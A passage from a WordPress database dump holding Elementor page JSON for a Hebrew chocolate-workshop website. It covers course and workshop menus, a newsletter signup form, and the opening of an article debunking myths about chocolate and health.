\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"9dc0267\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"1c80b63c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"269f0e2a\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7d91b4cb\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"50ee25e1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"7235e8ee\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"27c53cbf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4e7c936f\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(823,171,'_elementor_version','0.4'),(824,172,'_menu_item_type','post_type'),(825,172,'_menu_item_menu_item_parent','0'),(826,172,'_menu_item_object_id','167'),(827,172,'_menu_item_object','page'),(828,172,'_menu_item_target',''),(829,172,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(830,172,'_menu_item_xfn',''),(831,172,'_menu_item_url',''),(837,174,'_edit_last','1'),(838,174,'_edit_lock','1527410001:1'),(839,174,'_elementor_edit_mode','builder'),(843,175,'_elementor_edit_mode','builder'),(846,174,'_wp_page_template','default'),(847,174,'_elementor_data','[{\"id\":\"64aada\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1423db10\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3a73781\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>\\u05de\\u05d9\\u05ea\\u05d5\\u05e1\\u05d9\\u05dd \\u05e2\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05d1\\u05e8\\u05d9\\u05d0\\u05d5\\u05ea: \\u05d4\\\"\\u05e2\\u05d5\\u05d1\\u05d3\\u05d5\\u05ea\\\" \\u05e9\\u05dc\\u05d0 \\u05e6\\u05e8\\u05d9\\u05da \\u05dc\\u05d4\\u05d0\\u05de\\u05d9\\u05df \\u05dc\\u05d4\\u05df<\\/h2><p>\\u05de\\u05d3\\u05d9 \\u05d7\\u05d5\\u05d3\\u05e9 \\u05de\\u05ea\\u05e4\\u05e8\\u05e1\\u05de\\u05d5\\u05ea \\u05d1\\u05ea\\u05e7\\u05e9\\u05d5\\u05e8\\u05ea \\\"\\u05e2\\u05d5\\u05d1\\u05d3\\u05d5\\u05ea\\\" \\u05d7\\u05d3\\u05e9\\u05d5\\u05ea \\u05d4\\u05e0\\u05d5\\u05d2\\u05e2\\u05d5\\u05ea \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3. \\u05d1\\u05d7\\u05d5\\u05d3\\u05e9 \\u05d0\\u05d7\\u05d3, \\u05d4\\u05e8\\u05d5\\u05e4\\u05d0\\u05d9\\u05dd \\u05d5\\u05d4\\u05de\\u05d3\\u05e2\\u05e0\\u05d9\\u05dd \\u05e7\\u05d5\\u05e8\\u05d0\\u05d9\\u05dd \\u05dc\\u05db\\u05d5\\u05dc\\u05e0\\u05d5 \\u05dc\\u05d4\\u05e4\\u05e1\\u05d9\\u05e7 \\u05db\\u05dc\\u05d9\\u05dc \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d5\\u05d1\\u05d7\\u05d5\\u05d3\\u05e9 \\u05e9\\u05dc\\u05d0\\u05d7\\u05e8\\u05d9\\u05d5, \\u05de\\u05e1\\u05ea\\u05d1\\u05e8 \\u05e9\\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05dc\\u05d0 \\u05d0\\u05d5\\u05db\\u05dc\\u05d9\\u05dd \\u05de\\u05e1\\u05e4\\u05d9\\u05e7 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3.<\\/p><p>\\u05dc\\u05db\\u05df, \\u05d0\\u05d7\\u05ea \\u05d5\\u05dc\\u05ea\\u05de\\u05d9\\u05d3, \\u05d1\\u05d5\\u05d0\\u05d5 \\u05e0\\u05d7\\u05dc\\u05d9\\u05e3 \\u05d0\\u05ea \\u05d4\\u05de\\u05d9\\u05ea\\u05d5\\u05e1\\u05d9\\u05dd \\u05d4\\u05e0\\u05e4\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d2\\u05d1\\u05d9 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05d1\\u05e8\\u05d9\\u05d0\\u05d5\\u05ea, \\u05e2\\u05dd \\u05d4\\u05d0\\u05de\\u05ea. \\u05e8\\u05de\\u05d6: \\u05db\\u05de\\u05d5 \\u05d1\\u05db\\u05dc \\u05d3\\u05d1\\u05e8 \\u05d0\\u05d7\\u05e8 \\u05d1\\u05d7\\u05d9\\u05d9\\u05dd, \\u05de\\u05d9\\u05dc\\u05ea \\u05d4\\u05de\\u05e4\\u05ea\\u05d7 \\u05d4\\u05d9\\u05d0 \\u05de\\u05ea\\u05d9\\u05e0\\u05d5\\u05ea.<\\/p><h2><strong>\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d8\\u05d5\\u05d1 \\u05dc\\u05d1\\u05e8\\u05d9\\u05d0\\u05d5\\u05ea<\\/strong><\\/h2><p>\\u05e4\\u05d5\\u05dc\\u05d9 \\u05e7\\u05e7\\u05d0\\u05d5, \\u05d4\\u05de\\u05e8\\u05db\\u05d9\\u05d1 \\u05d4\\u05e2\\u05d9\\u05e7\\u05e8\\u05d9 \\u05d1\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05de\\u05db\\u05dc\\u05d9\\u05dd \\u05e4\\u05d5\\u05dc\\u05d9\\u05e4\\u05e0\\u05d5\\u05dc\\u05d9\\u05dd \\u05d8\\u05d1\\u05e2\\u05d9\\u05d9\\u05dd. \\u05e8\\u05d0\\u05d9\\u05d5\\u05ea \\u05de\\u05d3\\u05e2\\u05d9\\u05d5\\u05ea \\u05de\\u05d5\\u05db\\u05d9\\u05d7\\u05d5\\u05ea \\u05e9\\u05e8\\u05db\\u05d9\\u05d1\\u05d9\\u05dd \\u05d0\\u05dc\\u05d5 \\u05de\\u05e1\\u05d9\\u05d9\\u05e2\\u05d9\\u05dd \\u05dc\\u05d4\\u05e4\\u05d7\\u05ea\\u05ea \\u05dc\\u05d7\\u05e5 \\u05d4\\u05d3\\u05dd \\u05d1\\u05e9\\u05dc \\u05d4\\u05ea\\u05db\\u05d5\\u05e0\\u05d5\\u05ea \\u05e0\\u05d5\\u05d2\\u05d3\\u05d5\\u05ea \\u05d4\\u05d7\\u05de\\u05e6\\u05d5\\u05df \\u05e9\\u05dc\\u05d4\\u05dd.<\\/p><p>\\u05d0\\u05da \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05db\\u05d9\\u05dc \\u05d2\\u05dd \\u05e8\\u05de\\u05d5\\u05ea \\u05d2\\u05d1\\u05d5\\u05d4\\u05d5\\u05ea \\u05e9\\u05dc \\u05e1\\u05d5\\u05db\\u05e8 \\u05d5\\u05e9\\u05d5\\u05de\\u05df \\u05e8\\u05d5\\u05d5\\u05d9. \\u05d6\\u05d4\\u05d5 \\u05d4\\u05de\\u05db\\u05d9\\u05dc \\u05e8\\u05de\\u05d5\\u05ea \\u05d2\\u05d1\\u05d5\\u05d4\\u05d5\\u05ea \\u05e9\\u05dc \\u05e7\\u05dc\\u05d5\\u05e8\\u05d9\\u05d5\\u05ea, \\u05d5\\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d3\\u05d9 \\u05de\\u05de\\u05e0\\u05d5 \\u05e2\\u05dc\\u05d5\\u05dc \\u05dc\\u05d2\\u05e8\\u05d5\\u05dd \\u05dc\\u05de\\u05e9\\u05e7\\u05dc \\u05e2\\u05d5\\u05d3\\u05e3, \\u05d5\\u05d4\\u05d2\\u05d1\\u05e8\\u05ea \\u05d4\\u05e1\\u05d9\\u05db\\u05d5\\u05df \\u05dc\\u05de\\u05d7\\u05dc\\u05d5\\u05ea \\u05dc\\u05d1 \\u05d5\\u05db\\u05dc\\u05d9 \\u05d3\\u05dd.<\\/p><h2><strong>\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e0\\u05d5\\u05ea\\u05df \\u05d0\\u05e0\\u05e8\\u05d2\\u05d9\\u05d4<\\/strong><\\/h2><p>\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05db\\u05d9\\u05dc \\u05db\\u05de\\u05d5\\u05d9\\u05d5\\u05ea \\u05e7\\u05d8\\u05e0\\u05d5\\u05ea \\u05e9\\u05dc \\u05e7\\u05e4\\u05d0\\u05d9\\u05df, \\u05e9\\u05e2\\u05e9\\u05d5\\u05d9 \\u05dc\\u05ea\\u05e8\\u05d5\\u05dd \\u05dc\\u05e8\\u05e2\\u05d9\\u05d5\\u05df \\u05e9\\u05d4\\u05d5\\u05d0 \\u05de\\u05d2\\u05d1\\u05d9\\u05e8 \\u05d0\\u05ea \\u05d4\\u05d0\\u05e0\\u05e8\\u05d2\\u05d9\\u05d4 \\u05d1\\u05d2\\u05d5\\u05e3. \\u05d1\\u05e2\\u05d5\\u05d3 \\u05e9\\u05d6\\u05d4 \\u05e0\\u05db\\u05d5\\u05df, \\u05de\\u05d5\\u05de\\u05dc\\u05e5 \\u05dc\\u05d1\\u05d7\\u05d5\\u05e8 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05dd \\u05d4\\u05de\\u05e1\\u05e4\\u05e7\\u05d9\\u05dd \\u05e9\\u05d7\\u05e8\\u05d5\\u05e8 \\u05d0\\u05e0\\u05e8\\u05d2\\u05d9\\u05d4 \\u05de\\u05ea\\u05de\\u05e9\\u05db\\u05ea, \\u05d5\\u05d4\\u05de\\u05db\\u05d9\\u05dc\\u05d9\\u05dd \\u05e4\\u05d7\\u05d5\\u05ea \\u05e1\\u05d5\\u05db\\u05e8 \\u05d5\\u05e9\\u05d5\\u05de\\u05df.<\\/p><h2><strong>\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e8\\u05d9\\u05e8 \\u05d1\\u05e8\\u05d9\\u05d0 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d7\\u05dc\\u05d1<\\/strong><\\/h2><p>\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e8\\u05d9\\u05e8 \\u05de\\u05db\\u05d9\\u05dc \\u05d9\\u05d5\\u05ea\\u05e8 \\u05e7\\u05e7\\u05d0\\u05d5 \\u05de\\u05d5\\u05e6\\u05e7 \\u05d5\\u05d7\\u05de\\u05d0\\u05ea \\u05e7\\u05e7\\u05d0\\u05d5 \\u05de\\u05d0\\u05e9\\u05e8 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d7\\u05dc\\u05d1, \\u05d0\\u05da \\u05db\\u05de\\u05d5\\u05ea \\u05d4\\u05e4\\u05d5\\u05dc\\u05d9\\u05e4 \\u05e0\\u05d5\\u05dc\\u05d9\\u05dd \\u05ea\\u05dc\\u05d5\\u05d9\\u05d4 \\u05d1\\u05d0\\u05d5\\u05e4\\u05df \\u05e9\\u05d1\\u05d5 \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e2\\u05d5\\u05d1\\u05d3, \\u05d5\\u05dc\\u05db\\u05df \\u05d7\\u05e9\\u05d5\\u05d1 \\u05dc\\u05d4\\u05ea\\u05de\\u05e7\\u05d3 \\u05d1\\u05d0\\u05d5\\u05e4\\u05df \\u05d4\\u05d9\\u05d9\\u05e6\\u05d5\\u05e8 \\u05e9\\u05dc \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3.<\\/p><p>\\u05d1\\u05de\\u05d4\\u05dc\\u05da \\u05ea\\u05d4\\u05dc\\u05d9\\u05da \\u05d4\\u05d9\\u05d9\\u05e6\\u05d5\\u05e8, \\u05e0\\u05d9\\u05e7\\u05d5\\u05d9, \\u05ea\\u05e1\\u05d9\\u05e1\\u05d4, \\u05d6\\u05de\\u05df \\u05e6\\u05dc\\u05d9\\u05d9\\u05d4 \\u05d5\\u05d8\\u05de\\u05e4\\u05e8\\u05d8\\u05d5\\u05e8\\u05d4, \\u05ea\\u05d5\\u05e1\\u05e4\\u05ea \\u05d0\\u05dc\\u05e7\\u05dc\\u05d9\\u05d6\\u05e6\\u05d9\\u05d4 \\u05d5\\u05d4\\u05d5\\u05e1\\u05e4\\u05ea \\u05de\\u05e8\\u05db\\u05d9\\u05d1\\u05d9\\u05dd \\u05e0\\u05d5\\u05e1\\u05e4\\u05d9\\u05dd \\u05dc\\u05e7\\u05e7\\u05d0\\u05d5, \\u05db\\u05d2\\u05d5\\u05df \\u05e1\\u05d5\\u05db\\u05e8 \\u05dc\\u05de\\u05e9\\u05dc, \\u05de\\u05e1\\u05d9\\u05e8\\u05d9\\u05dd \\u05db\\u05de\\u05e2\\u05d8 \\u05dc\\u05d7\\u05dc\\u05d5\\u05d8\\u05d9\\u05df \\u05d0\\u05ea \\u05d4\\u05e4\\u05d5\\u05dc\\u05d9\\u05e4 \\u05e0\\u05d5\\u05dc\\u05d9\\u05dd \\u05de\\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05de\\u05e8\\u05d9\\u05e8.<\\/p><h2><strong>\\u05d7\\u05d8\\u05d9\\u05e3 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e7\\u05d8\\u05df \\u05d0\\u05d7\\u05d3 \\u05d1\\u05d9\\u05d5\\u05dd \\u05dc\\u05d0 \\u05de\\u05d6\\u05d9\\u05e7 \\u05dc\\u05d1\\u05e8\\u05d9\\u05d0\\u05d5\\u05ea<\\/strong><\\/h2><p>\\u05e0\\u05db\\u05d5\\u05df. \\u05db\\u05dc \\u05e2\\u05d5\\u05d3 \\u05de\\u05e1\\u05ea\\u05e4\\u05e7\\u05d9\\u05dd \\u05d1\\u05d7\\u05d8\\u05d9\\u05e3 \\u05e7\\u05d8\\u05df \\u05d6\\u05d4 \\u05d1\\u05dc\\u05d1\\u05d3. \\u05d7\\u05de\\u05d9\\u05e9\\u05d4 \\u05d7\\u05d8\\u05d9\\u05e4\\u05d9\\u05dd \\u05d1\\u05d9\\u05d5\\u05dd, \\u05dc\\u05de\\u05e9\\u05dc, \\u05d9\\u05d5\\u05d1\\u05d9\\u05dc\\u05d5 \\u05dc\\u05e2\\u05dc\\u05d9\\u05d9\\u05d4 \\u05d1\\u05de\\u05e9\\u05e7\\u05dc. \\u05d7\\u05d8\\u05d9\\u05e3 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d0\\u05d7\\u05d3 \\u05de\\u05db\\u05d9\\u05dc \\u05d1\\u05de\\u05de\\u05d5\\u05e6\\u05e2 250 \\u05e7\\u05dc\\u05d5\\u05e8\\u05d9\\u05d5\\u05ea, \\u05db\\u05de\\u05e2\\u05d8 \\u05e8\\u05d1\\u05e2 \\u05de\\u05e6\\u05e8\\u05d9\\u05db\\u05ea \\u05d4\\u05e7\\u05dc\\u05d5\\u05e8\\u05d9\\u05d5\\u05ea \\u05d4\\u05de\\u05d5\\u05de\\u05dc\\u05e6\\u05ea \\u05d1\\u05d9\\u05d5\\u05dd.<\\/p><p>\\u05dc\\u05db\\u05df, \\u05d1\\u05de\\u05e7\\u05d5\\u05dd \\u05d7\\u05d8\\u05d9\\u05e3 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05de\\u05d5\\u05de\\u05dc\\u05e5 \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05e9\\u05dc\\u05d5\\u05e9 \\u05e7\\u05d5\\u05d1\\u05d9\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e7\\u05d8\\u05e0\\u05d5\\u05ea \\u05d1\\u05d9\\u05d5\\u05dd, \\u05d4\\u05de\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05d1\\u05e1\\u05d1\\u05d9\\u05d1\\u05d5\\u05ea 30-50 \\u05e7\\u05dc\\u05d5\\u05e8\\u05d9\\u05d5\\u05ea, \\u05d5\\u05d1\\u05db\\u05da \\u05dc\\u05e1\\u05e4\\u05e7 \\u05d0\\u05ea \\u05d4\\u05ea\\u05e9\\u05d5\\u05e7\\u05d4 \\u05dc\\u05de\\u05e9\\u05d4\\u05d5 \\u05de\\u05ea\\u05d5\\u05e7, \\u05de\\u05d1\\u05dc\\u05d9 \\u05dc\\u05e1\\u05db\\u05df \\u05d0\\u05ea \\u05d4\\u05d1\\u05e8\\u05d9\\u05d0\\u05d5\\u05ea \\u05d0\\u05d5 \\u05dc\\u05d4\\u05d5\\u05e1\\u05d9\\u05e3 \\u05dc\\u05de\\u05e9\\u05e7\\u05dc.<\\/p><h2><strong>\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05de\\u05db\\u05e8<\\/strong><\\/h2><p>\\u05e0\\u05db\\u05d5\\u05df. \\u05d0\\u05d1\\u05dc \\u05d1\\u05d0\\u05d5\\u05ea\\u05d4 \\u05de\\u05d9\\u05d3\\u05d4 \\u05d2\\u05dd \\u05d0\\u05e4\\u05e8\\u05e1\\u05e7\\u05d9\\u05dd, \\u05dc\\u05de\\u05e9\\u05dc, \\u05d9\\u05db\\u05d5\\u05dc\\u05d9\\u05dd \\u05dc\\u05d4\\u05d5\\u05d1\\u05d9\\u05dc \\u05dc\\u05d4\\u05ea\\u05de\\u05db\\u05e8\\u05d5\\u05ea \\u05d0\\u05dd \\u05dc\\u05d0 \\u05de\\u05e4\\u05e1\\u05d9\\u05e7\\u05d9\\u05dd \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05d0\\u05d5\\u05ea\\u05dd. \\u05dc\\u05db\\u05df \\u05d7\\u05e9\\u05d5\\u05d1 \\u05dc\\u05d4\\u05d1\\u05d9\\u05df \\u05d0\\u05ea \\u05d4\\u05d2\\u05d9\\u05e8\\u05d5\\u05d9\\u05d9\\u05dd \\u05d4\\u05de\\u05d5\\u05d1\\u05d9\\u05dc\\u05d9\\u05dd \\u05dc\\u05d4\\u05ea\\u05de\\u05db\\u05e8\\u05d5\\u05ea. \\u05d4\\u05e8\\u05d2\\u05e9\\u05d5\\u05ea \\u05dc\\u05d2\\u05d1\\u05d9 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05dd \\u05d4\\u05de\\u05db\\u05ea\\u05d9\\u05d1\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05d4\\u05ea\\u05e0\\u05d4\\u05d2\\u05d5\\u05ea, \\u05d4\\u05de\\u05d5\\u05d1\\u05d9\\u05dc\\u05d4 \\u05dc\\u05d7\\u05e9\\u05d9\\u05d1\\u05d4 \\u05d4\\u05de\\u05e7\\u05e9\\u05e8\\u05ea \\u05d0\\u05db\\u05d9\\u05dc\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e2\\u05dd \\u05ea\\u05d7\\u05d5\\u05e9\\u05ea \\u05e0\\u05d5\\u05d7\\u05d5\\u05ea, \\u05ea\\u05d2\\u05de\\u05d5\\u05dc \\u05d5\\u05d7\\u05d2\\u05d9\\u05d2\\u05d4.<\\/p><p>\\u05d4\\u05e7\\u05e9\\u05e8 \\u05d4\\u05d6\\u05d4 \\u05de\\u05db\\u05ea\\u05d9\\u05d1 \\u05d0\\u05ea 